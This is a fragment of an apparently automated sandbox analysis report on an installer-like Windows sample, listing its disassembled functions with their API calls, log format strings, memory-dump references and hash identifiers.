                                                                                                                                                                                                                                                                  • API String ID: 2568930968-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                  • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                                                                                                                                                                                                                                  Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                  • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                  • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                  Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                  • String ID: !
                                                                                                                                                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                  • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                  • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                  Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                  • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                  • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                  • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                  • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                  Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                  • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                  • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                  • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                  • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                  • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                  Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                    • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                    • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                  • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                  • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                  • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                  • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                  • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                  Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                  • String ID: %02x%c$...
                                                                                                                                                                                                                                                                  • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                  • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                  • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                                                  Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                    • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                  • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                  • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                  • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                  • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                  • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                                                  Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                    • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425576,755723A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                    • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                  • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                  • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                  Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                  • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                  • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                  • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                  • String ID: Version
                                                                                                                                                                                                                                                                  • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                  • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                  • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                  Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1401228158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401174321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401275272.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401316477.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1401444709.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_nB52P46OJD.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                  • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                  • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                  Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
